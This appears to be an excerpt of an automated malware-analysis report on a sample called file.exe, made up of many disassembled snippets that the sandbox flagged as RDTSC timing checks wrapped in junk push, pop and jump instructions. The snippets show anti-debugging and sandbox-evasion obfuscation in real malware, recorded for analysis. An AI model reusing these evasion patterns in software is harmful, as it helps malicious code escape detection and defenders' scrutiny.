                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101E0 second address: 51101FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F2EE4767543h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51101FE second address: 5110224 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110224 second address: 511022A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511022A second address: 5110230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110230 second address: 5110234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110234 second address: 511034F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a pushad 0x0000000b jmp 00007F2EE4744186h 0x00000010 pushfd 0x00000011 jmp 00007F2EE4744182h 0x00000016 and eax, 39A07D28h 0x0000001c jmp 00007F2EE474417Bh 0x00000021 popfd 0x00000022 popad 0x00000023 je 00007F2F56562510h 0x00000029 jmp 00007F2EE4744186h 0x0000002e cmp dword ptr [esi+08h], DDEEDDEEh 0x00000035 jmp 00007F2EE4744180h 0x0000003a je 00007F2F565624F3h 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F2EE474417Eh 0x00000047 adc al, FFFFFFE8h 0x0000004a jmp 00007F2EE474417Bh 0x0000004f popfd 0x00000050 mov dx, si 0x00000053 popad 0x00000054 mov edx, dword ptr [esi+44h] 0x00000057 jmp 00007F2EE4744182h 0x0000005c or edx, dword ptr [ebp+0Ch] 0x0000005f jmp 00007F2EE4744180h 0x00000064 test edx, 61000000h 0x0000006a pushad 0x0000006b jmp 00007F2EE474417Eh 0x00000070 push eax 0x00000071 jmp 00007F2EE4744181h 0x00000076 pop esi 0x00000077 popad 0x00000078 jne 00007F2F565624D6h 0x0000007e jmp 00007F2EE4744187h 0x00000083 test byte ptr [esi+48h], 00000001h 0x00000087 push eax 0x00000088 push edx 0x00000089 push eax 0x0000008a push edx 0x0000008b push eax 0x0000008c push edx 0x0000008d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 511034F second address: 5110353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110353 second address: 5110359 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110359 second address: 5110376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4767549h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110376 second address: 5110388 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F2F56562499h 0x0000000e pushad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100791 second address: 51007FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F2EE476753Ch 0x00000010 mov dx, si 0x00000013 pop ecx 0x00000014 mov ax, di 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a movzx esi, dx 0x0000001d mov bh, 75h 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 pushfd 0x00000027 jmp 00007F2EE4767545h 0x0000002c xor si, 9736h 0x00000031 jmp 00007F2EE4767541h 0x00000036 popfd 0x00000037 popad 0x00000038 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51007FC second address: 510087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2EE4744187h 0x00000009 or ax, 746Eh 0x0000000e jmp 00007F2EE4744189h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F2EE4744180h 0x0000001a or ecx, 15189FE8h 0x00000020 jmp 00007F2EE474417Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 mov ebp, esp 0x0000002b jmp 00007F2EE4744186h 0x00000030 and esp, FFFFFFF8h 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushad 0x00000037 popad 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510087E second address: 5100883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100883 second address: 51008B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744186h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2EE4744187h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51008B7 second address: 51008F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F2EE476753Bh 0x0000000b and ax, 8A9Eh 0x00000010 jmp 00007F2EE4767549h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d mov ax, di 0x00000020 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51008F1 second address: 510091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2EE4744185h 0x00000009 popad 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2EE474417Dh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510091B second address: 5100950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767541h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F2EE476753Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2EE476753Eh 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100950 second address: 510099E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e mov cl, dl 0x00000010 popad 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F2EE4744185h 0x0000001d add eax, 0CF26656h 0x00000023 jmp 00007F2EE4744181h 0x00000028 popfd 0x00000029 mov ebx, esi 0x0000002b popad 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 510099E second address: 51009D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 movsx edi, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F2EE4767547h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 call 00007F2EE476753Bh 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51009D5 second address: 51009DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51009DA second address: 51009E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51009E0 second address: 5100A5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F2F56569B1Ch 0x0000000e pushad 0x0000000f mov ecx, 7781E87Fh 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f pushad 0x00000020 mov edi, 3D69F350h 0x00000025 mov al, bl 0x00000027 popad 0x00000028 mov ecx, esi 0x0000002a pushad 0x0000002b mov ebx, ecx 0x0000002d popad 0x0000002e je 00007F2F56569B0Bh 0x00000034 jmp 00007F2EE4744184h 0x00000039 test byte ptr [76FB6968h], 00000002h 0x00000040 jmp 00007F2EE4744180h 0x00000045 jne 00007F2F56569AEDh 0x0000004b jmp 00007F2EE4744180h 0x00000050 mov edx, dword ptr [ebp+0Ch] 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A5E second address: 5100A64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A64 second address: 5100A76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 movzx ecx, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A76 second address: 5100A91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4767547h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A91 second address: 5100A97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A97 second address: 5100A9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100A9B second address: 5100AC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F2EE4744185h 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100AC6 second address: 5100AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100AD6 second address: 5100AFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2EE4744185h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100AFF second address: 5100B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE476753Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100B0F second address: 5100BC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F2EE474417Fh 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 pop eax 0x00000015 jmp 00007F2EE4744185h 0x0000001a popad 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov edi, eax 0x0000001f call 00007F2EE4744188h 0x00000024 mov dx, si 0x00000027 pop eax 0x00000028 popad 0x00000029 push dword ptr [ebp+14h] 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F2EE4744183h 0x00000033 jmp 00007F2EE4744183h 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007F2EE4744188h 0x0000003f adc cl, FFFFFFB8h 0x00000042 jmp 00007F2EE474417Bh 0x00000047 popfd 0x00000048 popad 0x00000049 push dword ptr [ebp+10h] 0x0000004c pushad 0x0000004d push esi 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100BE6 second address: 5100C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 call 00007F2EE476753Fh 0x0000000a mov ecx, 62CB02BFh 0x0000000f pop eax 0x00000010 popad 0x00000011 pop esi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov si, di 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C08 second address: 5100C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C0C second address: 5100C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov bl, D4h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C16 second address: 5100C25 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C25 second address: 5100C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C29 second address: 5100C2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C2F second address: 5100C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2EE476753Ch 0x00000008 pushfd 0x00000009 jmp 00007F2EE4767542h 0x0000000e xor eax, 2C3BDB38h 0x00000014 jmp 00007F2EE476753Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d mov esp, ebp 0x0000001f jmp 00007F2EE4767546h 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 movsx ebx, cx 0x0000002b push eax 0x0000002c pop ebx 0x0000002d popad 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C88 second address: 5100C8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5100C8E second address: 5100C92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110CC2 second address: 5110CFE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2EE4744182h 0x00000008 or al, FFFFFFD8h 0x0000000b jmp 00007F2EE474417Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F2EE4744180h 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110CFE second address: 5110D04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110D04 second address: 5110D21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2EE4744180h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110D21 second address: 5110D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110D27 second address: 5110D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110D2B second address: 5110D8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F2EE4767549h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov ebx, eax 0x00000013 pushfd 0x00000014 jmp 00007F2EE4767548h 0x00000019 sbb ecx, 0405AB58h 0x0000001f jmp 00007F2EE476753Bh 0x00000024 popfd 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a call 00007F2EE476753Bh 0x0000002f pop esi 0x00000030 popad 0x00000031 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5110AC3 second address: 5110B21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F2EE4744180h 0x00000011 sbb al, FFFFFFF8h 0x00000014 jmp 00007F2EE474417Bh 0x00000019 popfd 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d jmp 00007F2EE4744186h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F2EE4744187h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180979 second address: 518097F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51807ED second address: 518082E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE474417Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F2EE474417Bh 0x00000013 sbb ax, E45Eh 0x00000018 jmp 00007F2EE4744189h 0x0000001d popfd 0x0000001e mov edi, esi 0x00000020 popad 0x00000021 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518082E second address: 518084A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2EE4767548h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518084A second address: 518087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F2EE474417Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F2EE4744180h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518087A second address: 518087E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 518087E second address: 5180884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51201E6 second address: 5120218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2EE4767546h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120218 second address: 512021C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 512021C second address: 5120222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120222 second address: 5120241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744184h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120241 second address: 5120245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5120245 second address: 512024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180C99 second address: 5180C9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180C9E second address: 5180CA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180CA3 second address: 5180CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F2EE4767546h 0x0000000a sbb esi, 41C9CEC8h 0x00000010 jmp 00007F2EE476753Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F2EE4767540h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180CE9 second address: 5180CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180CEF second address: 5180D0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE476753Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180D0A second address: 5180D27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2EE4744189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180D27 second address: 5180D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180D2D second address: 5180D82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b jmp 00007F2EE474417Fh 0x00000010 call 00007F2EE4744179h 0x00000015 pushad 0x00000016 mov cl, 94h 0x00000018 pushfd 0x00000019 jmp 00007F2EE4744181h 0x0000001e sub ah, 00000006h 0x00000021 jmp 00007F2EE4744181h 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180D82 second address: 5180D86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180D86 second address: 5180D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5180E4A second address: 5180EB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2EE4767547h 0x00000009 xor si, 62CEh 0x0000000e jmp 00007F2EE4767549h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 movzx eax, al 0x0000001c jmp 00007F2EE476753Ch 0x00000021 pop ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F2EE4767547h 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBD32 second address: 9BBD36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBD36 second address: 9BBD4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jno 00007F2EE4767536h 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBEF8 second address: 9BBF1D instructions: 0x00000000 rdtsc 0x00000002 ja 00007F2EE474417Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2EE4744180h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BBF1D second address: 9BBF21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
